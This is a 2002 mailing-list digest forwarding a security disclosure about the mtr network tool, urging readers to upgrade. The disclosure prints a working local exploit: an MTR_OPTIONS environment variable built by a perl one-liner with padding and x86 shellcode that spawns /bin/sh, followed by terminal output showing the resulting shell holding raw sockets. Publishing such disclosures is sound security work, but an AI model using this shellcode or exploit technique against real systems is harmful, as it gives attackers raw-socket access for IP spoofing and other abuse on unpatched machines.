[Have no clue what mtr is, but people I talked to seem to like it. Please upgrade if you use it -- Raju]
This is an RFC 1153 digest. (1 message) ---------------------------------------------------------------------- Return-Path: <[EMAIL PROTECTED]> Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm Message-ID: <[EMAIL PROTECTED]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Virus-Scanned: by AMaViS perl-10 From: Przemyslaw Frasunek <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: mtr 0.45, 0.46 Date: Wed, 6 Mar 2002 15:41:43 +0100 Few days ago, a new version of mtr has been released. Authors wrote in CHANGELOG, that they fixed a non-exploitable buffer overflow. In fact, this vulnerability is very easly exploitable and allows attacker to gain access to raw socket, which makes possible ip spoofing and other malicious network activity. The sample exploit is TRIVIAL because of strtok/while loop in vulnerable code. clitoris:/home/venglin/mtr-0.45> uname -smr Linux 2.4.8-26mdk i686 clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A "x130 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'` clitoris:/home/venglin/mtr-0.45> ./mtr sh-2.05$ At this point, exec'd shell has a raw socket opened: clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07 sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07 sh-2.05$ ls -la /proc/self/fd/ total 0 dr-x------ 2 venglin venglin 0 Mar 6 15:40 . dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 .. lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6 lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6 lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6 lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400] lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401] lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF * ------------------------------ End of this Digest ****************** -- Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/ It is the mind that moves _______________________________________________ linux-india-help mailing list [EMAIL PROTECTED] https://lists.sourceforge.net/lists/listinfo/linux-india-help
